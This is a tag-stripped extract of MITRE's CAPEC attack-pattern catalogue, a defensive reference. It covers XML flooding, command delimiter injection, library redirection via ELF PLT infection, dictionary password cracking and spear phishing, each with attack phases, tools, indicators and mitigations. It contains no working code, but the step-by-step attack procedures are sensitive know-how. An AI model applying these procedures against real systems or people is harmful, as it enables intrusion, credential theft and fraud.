An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.
Survey the target
Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.
Use an automated tool to record all instances of URLs to process XML requests.
env-Web env-ClientServer
Use a browser to manually explore the website and analyze how the application processes XML requests.
env-Web env-ClientServer
The URL processes XML requests.
env-Web env-ClientServer
The application does not accept XML requests.
env-Web env-ClientServer
A list of URLs which process XML requests.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Launch a resource depletion attack
The attacker delivers a large number of small XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.
Send a large number of crafted small XML messages to the target URL.
env-Web env-ClientServer
The attacker causes the target application denial of service.
Monitor velocity of page fetching in web logs.
Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.
The target must receive and process XML transactions.
Medium
Low
Flooding
Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service.
Low
To send small XML messages
High
To use distributed network to launch the attack
Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target.
Design
Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.
Implementation: Provide for network flow control and traffic shaping to control access to the resources.
Availability
DoS: resource consumption (other)
DoS: resource consumption (other)
XML-capable system interfaces
Maliciously crafted XML messages
XML inspection, parsing and validation routines.
Denial of Service
400
Targeted
770
Targeted
CAPEC-159
Redirect Access to Libraries
1000
Attack Pattern
ChildOf
528
Exploitation
Low
Low
High
SOA
Web
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the attackers' content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the attacker will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud if the content governs financial transactions, privacy violations, and other results.
The target must provide content but fail to adequately protect it against modification.
Medium
No special resources are required by the client for most forms of the attack. If the content is to be modified in transit, the attacker must be able to intercept the targeted messages. In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target's web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker must be able to host the replacement content.
333
Category
HasMember
345
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.
The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.
Medium
The attacker must be able to see the names of the files the target is creating.
1000
Attack Pattern
ChildOf
150
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
Assess Target Runtime Environment
In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system's runtime environment. Knowing the environment is vital to choosing the correct delimiters.
Port mapping using network connection-based software (e.g., nmap, nessus, etc.)
env-ClientServer env-Embedded env-CommProtocol env-Peer2Peer env-Web
Port mapping by exploring the operating system (netstat, sockstat, etc.)
env-Local
TCP/IP Fingerprinting
env-All
Induce errors to find informative error messages
env-All
The target software accepts connections via the network.
env-Web env-CommProtocol env-Peer2Peer env-Embedded
Operating environment (operating system, language, and/or middleware) is correctly identified.
Multiple candidate operating environments are suggested.
Provide misleading information on TCIP/IP fingerprints (some operating systems can be configured to send signatures that match other operating systems).
Provide misleading information at the server level (e.g., Apache, IIS, WebLogic, etc.) to announce a different server software.
Some fingerprinting techniques can be detected by operating systems or by network IDS systems because they leave the network connection half-open, or they do not belong to a valid, open connection.
Survey the Application
The attacker surveys the target application, possibly as a valid and authenticated user
Spidering web sites for all available links
env-Web
Inventory all application inputs
env-All
Attacker develops a list of valid inputs
env-Web env-ClientServer
The attacker develops a list of likely command delimiters.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Attempt delimiters in inputs
The attacker systematically attempts variations of delimiters on known inputs, observing the application's response each time.
Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
env-CommProtocol env-Web env-Peer2Peer env-ClientServer
Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)
env-Web
Enter command delimiters directly in input fields.
env-Embedded env-Local env-ClientServer
Attack step 2 is successful.
env-All
One or more command delimiters for the platform provokes an unexpected response from the software, which can be varied by the attacker based on the input.
Use malicious command delimiters
The attacker uses combinations of payload and carefully placed command delimiters to attack the software.
The software performs as expected by the attacker.
Monitor user input to the software.
Apply appropriate input validation to filter all user-controlled input to the software.
Actively monitor the application and either deny or redirect requests from origins that appear to be attacking the software.
Software's input validation or filtering must not detect and block presence of additional malicious command.
High
High
Injection
By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.
LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.
Medium
The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session.
Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP.
Design: Perform whitelist validation against a positive specification for command length, type, and parameters.
Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account
Implementation: Perform input validation for all remote content.
Implementation: Use type conversions such as JDBC prepared statements.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read application data
Malicious input delivered through appending delimiters to standard input
Command(s) appended to valid parameters to enable attacker to execute commands on host
Client machine and client network
Enables attacker to execute server side code with any commands that the program owner has privileges to.
146
Targeted
77
Targeted
184
Targeted
78
Targeted
185
Targeted
93
Targeted
140
Targeted
157
Targeted
138
Targeted
154
Targeted
697
Targeted
713
Targeted
1000
Attack Pattern
ChildOf
137
Penetration
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most, systems, files and resources are organized in the same tree structure. This can be useful for attackers because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may know be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Attackers can take advantage of this to commit other types of attacks.
The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type.
Medium
No special resources are required for most variants of this attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside.
1000
Attack Pattern
ChildOf
116
CAPEC Content Team
The MITRE Corporation
2014-06-23
Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials. Alternatively, an attacker may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.
The identity associated with the message or resource must be removable or modifiable in an undetectable way for the attacker to perform this attack.
Medium
No special resource are required for most variants of this attack.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target. For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.
The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control.
Medium
No special resources are required for most variants of this attack.
1000
Category
ChildOf
262
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, in an attempt to leverage an alternate of malicious resource, causes an application to look for a resource in an unintended location. This differs from a resource manipulation attack in which the contents of the resource are affected or where the resources themselves are physically altered or moved. Instead, this attack simply concerns itself with the paths used to find or create resources.
None. All applications rely on file paths and so, in theory, they or their resources could be affected by this attack.
Medium
No special resources are required for most variants of this attack.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an attacker might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the attacker could recover this from the web cache.
The target application must utilize temporary files and must fail to adequately secure them against other parties reading them.
Medium
Because some application may have a large number of temporary files and/or these temporary files may be very large, an attacker may need tools that help them quickly search these files for sensitive information. If the attacker can simply copy the files to another location and if the speed of the search is not important, the attacker can still perform the attack without any special resources.
311
Targeted
1000
Category
ChildOf
223
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker monitors information transmitted between logical or physical nodes of a network. The attacker need not be able to prevent reception or change content but must simply be able to observe and read the traffic. The attacker might precipitate or indirectly influence the content of the observed transaction, but the attacker is never the intended recipient of the information. Any transmission medium can theoretically be sniffed if the attacker can listen to the contents between the sender and recipient.
Any target that transmits readable data could be attacked in this way. Cryptographic techniques that render a data-stream unreadable can thwart this type of attack.
Medium
The attacker must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the attacker may require special equipment and/or require that this equipment be placed in specific locations.
311
Targeted
1000
Attack Pattern
CanAlsoBe
158
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker monitoring network traffic between nodes of a public or multicast network. The attacker need not be able to prevent reception or change content but must simply be able to observe and read the traffic. The attacker might precipitate or indirectly influence the content of the observed transaction, but the attacker is never the intended recipient of the information. This differs from other sniffing attacks in that it is over a public network rather via some other communications channel, such as radio.
Any target that transmits readable data over a public or multicast network could be attacked in this way.
Medium
The attacker must be able to intercept the transmissions containing the data of interest. Depending on the network topology between the recipients, placement of listening equipment may be challenging (such as if both the sender and recipient are members of a single subnet and therefore the listener must also be attached to that subnet.
Cryptographic techniques that render a data-stream unreadable can thwart this type of attack.
311
Targeted
1000
Attack Pattern
ChildOf
117
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits the execution flow of a call to an external library to point to an attacker supplied library or code base, allowing the attacker to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an attacker can redirect an application's attempts to access these libraries to other libraries that the attacker supplies, the attacker will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.
Identify target general susceptibility
An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries.
The attacker uses a tool such as the OSX "otool" utility or manually probes whether the target application uses dynamically linked libraries.
env-Local
The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted.
env-Local
The target application uses dynamically linked libraries.
env-Local
The attacker can redirect or control access to files in areas leveraged by the target.
env-Local
The attacker can modify the entries in the configuration files to the libraries the attacker crafted.
env-Local
The attacker cannot modify the configuration files entries. The attacker may still be able to redirect access to libraries using other techniques such as using symbolic links.
env-Local
The application does not use dynamically linked libraries.
env-Local
The attacker can successfully redirect or control access to libraries leveraged by the target.
The attacker identifies and gains control of the configuration file containing entries of a list of dynamically linked libraries and be able to modify the entry to point to the malicious libraries the attacker created.
Restrict the permission to modify the entries in the configuration file.
Craft malicious libraries
The attacker uses knowledge gained in the Explore phase to craft malicious libraries that he will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code.
The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using "sleep(2)" and "usleep()" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.
env-Local
The entries in the configuration file points to the malicious libraries he crafted.
Restrict the permission to modify the entries in the configuration file.
If possible, use obfuscation and other techniques to prevent reverse engineering the libraries.
Redirect the access to libraries to the malicious libraries
The attacker redirects the target to the malicious libraries he crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries.
The attacker modifies the entries in the configuration files pointing to the malicious libraries he crafted.
env-Local
The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries he crafted.
132
env-Local
The attacker leverages file search path order issues to redirect the target to access the malicious libraries he crafted.
38
env-Local
The application is redirected to the malicious libraries the attacker crafted when the application attempts to call the legitimate libraries.
Restrict the permission to modify the entries in the configuration file.
Check the integrity of the dynamically linked libraries before using them.
If possible, use obfuscation and other techniques to prevent reverse engineering the libraries.
The target must utilize external libraries and must fail to verify the integrity of these libraries before using them.
Very High
High
Modification of Resources
Injection
API Abuse
In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... • mark the text segment writeable • save the PLT(GOT) entry • replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... • do the payload of the new lib call • restore the original PLT(GOT) entry • call the lib call • save the PLT(GOT) entry again (if its changed) • replace the PLT(GOT) entry with the address of the new lib call
Low
To modify the entries in the configuration file pointing to malicious libraries
Medium
To force symlink and timing issues for redirecting access to libraries
High
To reverse engineering the libraries and inject malicious code into the libraries
Implementation: Restrict the permission to modify the entries in the configuration file.
Implementation: Check the integrity of the dynamically linked libraries before use them.
Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries.
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Access_Control
Authorization
Bypass protection mechanism
714
Targeted
1000
Attack Pattern
ChildOf
154
Exploitation
Penetration
High
High
High
Client-Server
All
All
All
Silvio Cesare
Share Library Call Redirection Via ELF PLT Infection
Issue 56
Phrack Magazine
2000
http://www.phrack.org/issues.html?issue=56&id=7
OWASP Top 10
Top 10 2007 - Malicious File Execution
2007
The Open Web Application Security Project (OWASP)
https://www.owasp.org/index.php/Top_10_2007-A3
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.
Determine application's/system's password policy
Determine the password policies of the target application/system.
Determine minimum and maximum allowed password lengths.
env-All
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
env-All
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
env-All
Passwords are used in the application/system
env-All
Passwords are not used in the application/system.
env-All
Select dictionaries
Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)
Select dictionary based on particular users' preferred languages.
env-All
Select dictionary based on the application/system's supported languages.
env-All
Determine username(s) to target
Determine username(s) whose passwords to crack.
Obtain username(s) by sniffing network packets.
env-CommProtocol env-Peer2Peer env-ClientServer
Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)
env-All
Obtain usernames from filesystem (e.g. list of directories in C:\Documents and Settings\ in Windows, and list in /etc/passwd in UNIX-like systems)
env-Embedded env-Local
Remote application or system provides no indication regarding whether a given username is valid or not.
env-ClientServer env-Peer2Peer env-Web env-CommProtocol
At least one valid username found.
Presence of any valid usernames could not be established.
Do not reveal information regarding validity of particular usernames to users.
Lock out accounts whose usernames are suspected to have been compromised.
Use dictionary to crack passwords.
Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.
Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).
env-All
Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s).
env-All
Application/system does not use password authentication.
env-All
Attacker determines correct password for a user ID and obtains access to application or system.
Attacker is unable to determine correct password for a user ID and obtain access to application or system.
Large number of authentication failures in logs.
Enforce strict account lockout policies.
Enforce strong passwords (having sufficient length and containing mix of lower case and upper case letters, numbers, and special characters)
The system uses one factor password based authentication.
The system does not have a sound password policy that is being enforced.
The system does not implement an effective password throttling mechanism.
High
Medium
Brute Force
A system user selects the word "treacherous" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.
The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.
Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.
Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.
CVE-2003-1096
Low
A variety of password cracking tools and dictionaries are available to launch this type of an attack.
A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack.
Many invalid login attempts are coming from the same machine (same IP address) or for the same log in name. The login attempts use passwords that are dictionary words.
Employ IP spoofing to make it seem like login attempts are coming from different machines.
Create a strong password policy and ensure that your system enforces this policy.
Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-02.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
521
Targeted
262
Targeted
263
Targeted
693
Targeted
1000
Attack Pattern
ChildOf
49
Penetration
High
Medium
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support <script< tags that allow scripting languages to be embedded in the page and then interpreted by the receiving web browser. If the content provider is malicious, these scripts can compromise the client application. Some applications may even execute the scripts under their own identity (rather than the identity of the user providing the script) which can allow attackers to perform activities that would otherwise be denied to them.
The target application must include the use of APIs that execute scripts.
The target application must allow the attacker to provide some or all of the arguments to one of these script interpretation methods and must fail to adequately filter these arguments for dangerous or unwanted script commands.
Medium
The attacker must have the ability to write a script and submit it to the appropriate API method in the target application.
1000
Attack Pattern
ChildOf
113
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits characteristics of the infrastructure of a network entity in order to perpetrate attacks or information gathering on network objects or effect a change in the ordinary information flow between network objects. Most often, this involves manipulation of the routing of network messages so, instead of arriving at their proper destination, they are directed towards an entity of the attackers' choosing, usually a server controlled by the attacker. The victim is often unaware that their messages are not being processed correctly. For example, a targeted client may believe they are connecting to their own bank but, in fact, be connecting to a Pharming site controlled by the attacker which then collects the user's login information in order to hijack the actual bank account.
The targeted client must access the site via infrastructure that the attacker has co-opted and must fail to adequately verify that the communication channel is operating correctly (e.g. by verifying that they are, in fact, connected to the site they intended.)
High
The attacker must be able to corrupt the infrastructure used by the client. For some variants of this attack, the attacker must be able to stand up their own services that mimic the services the targeted client intends to use.
1000
Category
ChildOf
262
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in the server's trust of client-side processing by modifying data on the client-side, such as price information, and then submitting this data to the server to effect a change in the state of an ordinary transaction. eShoplifting is a data manipulation attack against an on-line merchant during a purchasing transaction. The manipulation of price, discount or quantity fields in the transaction message allows the attacker to acquire items at a lower cost than the merchant intended. The attacker performs a normal purchasing transaction but edits hidden fields within the HTML form response that store price or other information to give themselves a better deal. The merchant then uses the modified pricing information in calculating the cost of the selected items.
The targeted merchant site must use a shopping cart that does not obfuscate the transaction data and does not validate pricing with back end processing.
High
The attacker must be able to craft HTTP responses to the target's shopping site.
602
Targeted
1000
Attack Pattern
ChildOf
212
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.
Obtain useful contextual detailed information about the targeted user or organization
An attacker collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding.
Conduct web searching research of target.
405
env-Web
Identify trusted associates, colleagues and friends of target.
405
env-All
Utilize social engineering attack patterns such as Pretexting.
407
env-All
Collect social information via dumpster diving.
406
env-All
Collect social information via traditional sources.
408
env-All
Collect social information via Non-traditional sources.
409
env-All
Optional: Obtain domain name and certificate to spoof legitimate site
This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.
Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L).
env-Web
Optionally obtain a legitimate SSL certificate for the new domain name.
env-Web
Websites can acquire many domain names that are similar to their own. For example, the company example.com should be sure to register example.net, .org, .biz, .info and so on. Likewise they should register exarnple.com, examp1e.com, exampIe.com (and possibly .net, .org variations). Although this does not preclude the possibility of phishing, it makes the attackers' job harder because all the easily believable names are taken.
Optional: Explore legitimate website and create duplicate
An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that he or she is trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.
Use spidering software to get copy of web pages on legitimate site.
env-Web
Manually save copies of required web pages from legitimate site.
env-Web
Create new web pages that have the legitimate site's look at feel, but contain completely new content.
env-Web
Optional: Build variants of the website with very specific user information e.g., living area, etc.
Once the attacker has his website which duplicates a legitimate website, he needs to build very custom user related information in it. For example, he could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website.
Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim.
env-Web
Convince user to enter sensitive information on attacker's site.
An attacker sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.
Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
env-Web
Place phishing link in post to online forum.
env-Web
Legitimate user clicks on link supplied by attacker and enters the requested information.
Legitimate user realizes that the e-mail is not legitimate, or that the attackers' website is not legitimate, and therefore, does not enter the information requested by the attacker.
Monitor server logs for referrers. Phishing websites frequently include links to "terms and conditions" "privacy" and other standard links on the legitimate site. Users' web browsers will generally reveal the phishing site in the Referrer header. Since the URL may not visually stand out compared to the legitimate URL, some programmatic consolidation of referrers from log files may be required to ensure that example.com stands out from examp1e.com, for example.
Use stolen credentials to log into legitimate site
Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.
Log in to the legitimate site using another user's supplied credentials.
env-Web
Use a human verifiable shared secret between legitimate site and end user such as the one provided by PassMark Security (now part of RSA Security). This prevents the attacker from using stolen credentials. Note that this does not protect against some man-in-the-middle attacks where an attacker establishes a session with the legitimate site and convinces an end user to establish a session with him. The attacker then records and forwards information flowing between the end user and the trusted site. This security control is currently used by many online banking websites including Bank of America's website.
Use an out-of-band user authentication mechanism before allowing particular computers to "register" to use the legitimate site with particular login credentials. This also prevents the attacker from using stolen credentials. An example may be sending a SMS message to the user's cell phone (cell phone number previously acquired by site) with an "activation code" every time the user attempts to log into the site from a new computer. This solution also does not protect against the man-in-the-middle attack described in the previous security control. This mechanism is currently used by several online banking websites including JP Morgan Chase's website.
None. Any user can be targeted by a Spear Phishing attack.
High
High
Social Engineering
Spoofing
John gets an official looking e-mail from his bank stating that his or her account has been temporarily locked due to suspected unauthorized activity that happened in the area different that where he lives (details might be provided by the spear phishers) and that John needs to click on the link included in the e-mail to log in to his bank account in order to unlock it. The link in the e-mail looks very similar to that of his bank and once the link is clicked, the log in page is the exact replica. John supplies his login credentials after which he is notified that his account has now been unlocked and that everything is fine. An attacker has just collected John's online banking information which can now be used by him or her to log into John's bank account and transfer John's money to a bank account of the attackers' choice.
Medium
Some web development tools to put up a fake website.
Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind.
Confidentiality
Read application data
Information Leakage
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Privilege Escalation
Integrity
Modify application data
Data Modification
1000
Attack Pattern
ChildOf
98
1000
Attack Pattern
CanFollow
405
1000
Attack Pattern
CanFollow
406
1000
Attack Pattern
CanFollow
407
http://capec.mitre.org/data/definitions/176.html
1000
Attack Pattern
CanFollow
408
1000
Attack Pattern
CanFollow
409
Exploitation
High
High
Low
Client-Server
n-Tier
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker targets mobile phone users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Mobile Phishing is a variation on the Phishing social engineering technique where the attack is initiated via mobile texting rather than email. The user is enticed to provide information or go to a compromised web site via a text message. Apart from the manner in which the attack is initiated, the attack proceeds as a standard Phishing attack.
Attacker needs mobile phone numbers to initiate the connection. The attacker must guess an area of interest for the mobile user to entice them to follow the link provided in the text message. The attacker must have a replicated web site as in a normal Phishing attack.
High
Either mobile phone or access to a web resource that allows text messages to be sent to mobile phones. Resources needed for regular Phishing attack.
1000
Attack Pattern
ChildOf
98
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker modifies file contents or attributes (such as extensions or names) of files in a manner to cause incorrect processing by an application. Attackers use this class of attacks to cause applications to enter unstable states, overwrite or expose sensitive information, and even execute arbitrary code with the application's privileges. This class of attacks differs from attacks on configuration information (even if file-based) in that file manipulation causes the file processing to result in non-standard behaviors, such as buffer overflows or use of the incorrect interpreter. Configuration attacks rely on the application interpreting files correctly in order to insert harmful configuration information. Likewise, resource location attacks rely on controlling an application's ability to locate files, whereas File Manipulation attacks do not require the application to look in a non-default location, although the two classes of attacks are often combined.
The target must use the affected file without verifying its integrity.
Medium
